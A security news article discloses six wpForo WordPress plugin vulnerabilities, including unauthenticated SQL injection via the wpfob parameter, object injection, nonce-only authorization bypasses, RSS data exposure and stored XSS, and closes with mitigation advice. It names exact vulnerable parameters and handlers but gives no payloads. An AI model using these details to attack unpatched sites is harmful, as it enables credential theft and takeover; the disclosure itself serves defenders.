wpForo Forum Plugin Hit by Six Critical Vulnerabilities

Security researchers disclosed a cluster of six vulnerabilities in wpForo Forum, a popular WordPress plugin with over 80,000 active installations. The flaws range from unauthenticated SQL injection to PHP object injection with RCE potential, creating multiple attack paths into WordPress sites running the plugin.

The most severe issues—CVE-2026-28562 and CVE-2026-1581—allow unauthenticated attackers to extract credentials and sensitive data directly from the WordPress database. No login required. Both flaws exist in wpForo version 2.4.14, the current release as of this disclosure.

Unauthenticated SQL Injection (CVE-2026-28562 and CVE-2026-1581)

CVE-2026-28562 targets the Topics::get_topics() function where the ORDER BY clause relies on esc_sql() sanitization that doesn't actually protect against injection in unquoted identifiers. Attackers exploit the wpfob parameter with CASE WHEN payloads to perform blind boolean extraction of credentials.

CVE-2026-1581 is a time-based SQL injection variant affecting the same wpfob parameter across all versions through 2.4.14. The function lacks prepared statements, letting attackers append queries that extract information by measuring response delays.

Both attacks work against default wpForo configurations with no prerequisite access. Automated exploitation is straightforward once the injection point is identified.

PHP Object Injection (CVE-2026-0910)

CVE-2026-0910 exists in versions through 2.4.13 due to unsafe deserialization in the wpforo_display_array_data function. Authenticated attackers with subscriber-level access can inject malicious PHP objects that—depending on the plugin chain available on the target site—could escalate to remote code execution.

The patch for this appeared in version 2.4.14, but that same version introduced the SQL injection flaws. Sites that upgraded to fix object injection now face a different critical vulnerability.

Authorization Bypass Flaws

Three additional CVEs affect wpForo 2.4.14's authorization model:

CVE-2026-28557: Authenticated users can trigger bulk usergroup reassignment via the wpforo_synch_roles AJAX handler. Attackers obtain a nonce from the usergroups admin page, then remap all wpForo usergroups to arbitrary WordPress roles—potentially escalating privileges site-wide.

CVE-2026-28554: Subscribers can approve or unapprove any forum post through the wpforo_approve_ajax handler. The check relies solely on nonce validation, ignoring whether the user has moderator permissions.

CVE-2026-28556: Authenticated subscribers can move, merge, or split any forum topic via topic_move, topic_merge, and topic_split handlers. Again, nonce-only validation allows content manipulation without proper authorization.

Information Disclosure (CVE-2026-28559)

CVE-2026-28559 lets unauthenticated users retrieve private and unapproved topics through the global RSS feed endpoint. Requesting the feed without a forum ID parameter bypasses privacy and status WHERE clauses, exposing content that should remain hidden.

Stored XSS (CVE-2026-28561)

Administrators can inject persistent JavaScript through forum description fields. The XSS echoes across multiple theme template files without output escaping. While requiring admin access to exploit, it enables privilege persistence and could facilitate attacks against other administrators.

What Admins Should Do

The vulnerability disclosure creates a difficult situation. Version 2.4.13 has the PHP object injection flaw. Version 2.4.14 has the SQL injection and authorization bypass flaws. No fully patched version exists as of this writing.

For WordPress sites running wpForo that can't afford to disable the plugin:

1. Implement WAF rules blocking SQL injection patterns in the wpfob parameter
2. Restrict forum access to authenticated users only where possible
3. Monitor database queries for suspicious extraction patterns
4. Disable the RSS feed functionality to prevent CVE-2026-28559

This situation echoes the WordPress plugin vulnerability surge we've tracked throughout 2026. The CleanTalk plugin CVE-2026-1490 auth bypass two weeks ago and the ACF Extended admin takeover flaw show the pattern continuing.

Site operators should monitor wpForo's changelog for a patched release and apply it immediately when available. Until then, consider whether the forum functionality justifies the exposure.